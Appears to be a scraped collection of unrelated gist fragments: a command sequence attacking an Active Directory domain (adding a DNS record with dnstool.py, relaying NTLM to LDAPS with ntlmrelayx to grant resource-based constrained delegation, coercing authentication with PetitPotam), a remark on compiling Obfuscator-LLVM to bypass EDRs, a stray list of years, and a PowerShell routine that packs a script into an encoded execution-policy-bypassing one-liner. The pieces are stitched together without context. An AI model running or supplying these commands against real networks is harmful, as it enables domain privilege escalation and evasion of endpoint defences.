| # setting up a DNS record in the domain, the zone I required was found in ForestDNSZones | |
| python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local | |
| # setting up a LDAPS relay to grant RBCD to computer account we have | |
| # in my case MAQ = 0, so I escalated on a domain workstation and used it | |
| sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da | |
| # PetitPotam to WebDAV with domain credentials (not patched) | |
| # DO NOT use FQDN here | |
| python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER |
Obfuscator-LLVM is a modified version of the LLVM compilers/toolchain to obfuscate source code. This can e.g. be used to bypass EDRs.
Someone might find this useful, since there was no step-by-step instructions on how to correctly compile OLLVM-16.
Required software:
| 1980 | |
| 1998 | |
| 2000 | |
| 2003 | |
| 2004 | |
| 2005 | |
| 2006 | |
| 2007 | |
| 2008 | |
| 2009 |
| $s = Get-Content script.ps1 | Out-String | |
| $j = [PSCustomObject]@{ | |
| "Script" = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($s)) | |
| } | ConvertTo-Json -Compress | |
| $oneline = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('" + $j + "' | ConvertFrom-Json).Script)) | iex" | |
| $c = [convert]::ToBase64String([System.Text.encoding]::Unicode.GetBytes($oneline)) | |
| ("Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded " + $c) | Out-File -Encoding Default script.cmd |